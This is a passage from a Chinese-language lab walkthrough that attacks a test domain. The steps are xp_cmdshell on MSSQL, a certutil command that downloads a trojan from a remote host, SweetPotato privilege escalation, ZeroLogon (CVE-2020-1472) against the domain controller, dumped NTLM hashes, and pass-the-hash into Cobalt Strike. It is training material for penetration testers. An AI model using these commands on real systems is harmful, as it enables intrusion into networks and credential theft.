6.mssqlclient 登录Mssql服务器

使用mysql用户和密码进行登录。

7.xp_cmshell进行getshell

help查看可以执行那些命令。

开启xp_cmdshell，然后进行信息收集。

使用certutil远程下载之前的木马，然后进行上线

xp_cmdshell certutil -urlcache -split -f http://x.x.x.x/artifact.exe c:/windows/temp/artifact.exe

8.使用SweetPotato (ms16-075)提权

上线之后，进行简单的信息收集。

然后使用第三方插件，利用SweetPotato (ms16-075)提权对其进行提权。

成功提权。

内网域渗透

1.内网域信息收集

使用net view查看域内主机。

使用hashdump进行抓取一些用户的hash值。

查看主机ip地址。

查看域控的Ip地址，和域控的计算机名。

2.ZeroLogon CVE-2020-1472 获取域控权限

编译zerolgin的脚本成为exe，然后进行测试，发现主机存在该漏洞。

将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0

3.配置代理，登录域控

配置kali的代理地址，然后进行端口扫描，测试代理是否连接。

获取域控的hash值。

Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::

然后进行登录域控。

4.PTH上线CS

关闭防火墙，利用pth进行上线cs。

成功执行命令。

生成tcp监听，然后jump到域控主机。

5.恢复密码、原hash。

恢复密码。

使用 secretsdump.py获取其hash值。

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCA

使用以下命令恢复域控密码。成功恢复其密码。

proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139 fb61e3c372e666adccb7a820aa39772f

靶机到这里就结束了。

最后，成功拿下整个域控。

总结：

该项目从环境搭建，使用vps将web1主机映射到公网上。通过信息收集，搜索源码，然后分析源码，进行sql注入。编写sql注入脚本进行注入，通过分析登录端的源码编写加密脚本，在编写目录穿越脚本成功获取webshell。在内网渗透中，使用frp反向代理上线cs，使用xp_cmdshell进行getshell。在域渗透中使用CVE-2020-1472获取域控权限。这台靶机中没装杀软，但是从外网打点到内网渗透，再到域渗透中的知识面是非常广的。